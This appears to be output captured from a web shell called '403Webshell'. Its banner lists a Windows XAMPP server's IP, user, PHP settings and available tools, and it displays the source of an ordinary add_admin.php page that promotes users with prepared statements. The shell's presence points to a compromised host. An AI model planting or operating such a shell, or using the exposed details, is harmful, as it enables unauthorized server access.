403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.48
Web Server : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
System : Windows NT DESKTOP-3H4FHQJ 10.0 build 19045 (Windows 10) AMD64
User : win 10 ( 0)
PHP Version : 8.2.12
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  D:/xampp/htdocs-coblaa/Cinevaa/

Current File : D:/xampp/htdocs-coblaa/Cinevaa/add_admin.php
<?php 
include('db.php'); 
include('con_db.php'); 
session_start();
if (!isset($_SESSION['my_id'])) {
    header("Location: login.php");
    exit();
}

$my_id = $_SESSION['my_id'];
// Security: Only existing admins can add new admins
if (!isset($_SESSION['is_admin']) || $_SESSION['is_admin'] !== true) {
    header("Location: index.php");
    exit();
}

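if (isset($_POST['submit'])) {
    $userid = $_POST['userid'] ?? ''; // ID of the existing user to promote
    $role = $_POST['role'] ?? '';

    // Accept only the role values offered by the form below
    if (!in_array($role, ['admin', 'editor'], true)) {
        exit("Error: Invalid role.");
    }

    // 1. Find the my_id from cb_userstb (prepared statement keeps user input out of the SQL text)
    $find_user = mysqli_prepare($conn, "SELECT my_id, fname FROM cb_userstb WHERE my_id = ?");
    mysqli_stmt_bind_param($find_user, "s", $userid);
    mysqli_stmt_execute($find_user);
    $user_row = mysqli_fetch_assoc(mysqli_stmt_get_result($find_user));

    if ($user_row) {
        $uname = $user_row['fname'];

        // 2. Insert into admins table linked by my_id (bound parameters, no string interpolation)
        $stmt = mysqli_prepare($con, "INSERT INTO admins (my_id, username, user_id, role) VALUES (?, ?, ?, ?)");
        mysqli_stmt_bind_param($stmt, "ssss", $my_id, $uname, $userid, $role);

        if (mysqli_stmt_execute($stmt)) {
            // Encode the message for the query string and stop so nothing else is sent after the redirect
            header("Location: admin_temp?msg=" . urlencode("User Promoted to Admin"));
            exit();
        } else {
            echo "Error: " . mysqli_error($con);
        }
    } else {
        echo "Error: No user found with this Id. They must register first.";
    }
}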
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <title>Add New Admin</title>
</head>
<body class="bg-light">
    <div class="container mt-5">
        <div class="row justify-content-center">
            <div class="col-md-6">
                <div class="card shadow">
                    <div class="card-header bg-primary text-white"><h5>Add New Admin</h5></div>
                    <div class="card-body">
                        <form action="add_admin.php" method="POST">
                            <div class="mb-3">
                                <label>Username</label>
                                <input type="text" name="username" class="form-control" required>
                            </div>
                            <div class="mb-3">
                                <label>User ID</label>
                                <input type="text" name="userid" class="form-control" required>
                            </div>
 
                            <div class="mb-3">
                                <label>Role</label>
                                <select name="role" class="form-select">
                                    <option value="admin">superadmin</option>
                                    <option value="editor">editor</option>
                                </select>
                            </div>
                            <button type="submit" name="submit" class="btn btn-success w-100">Save Admin</button>
                            <a href="index.php" class="btn btn-link w-100 mt-2">Back to List</a>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </div>
</body>
</html>
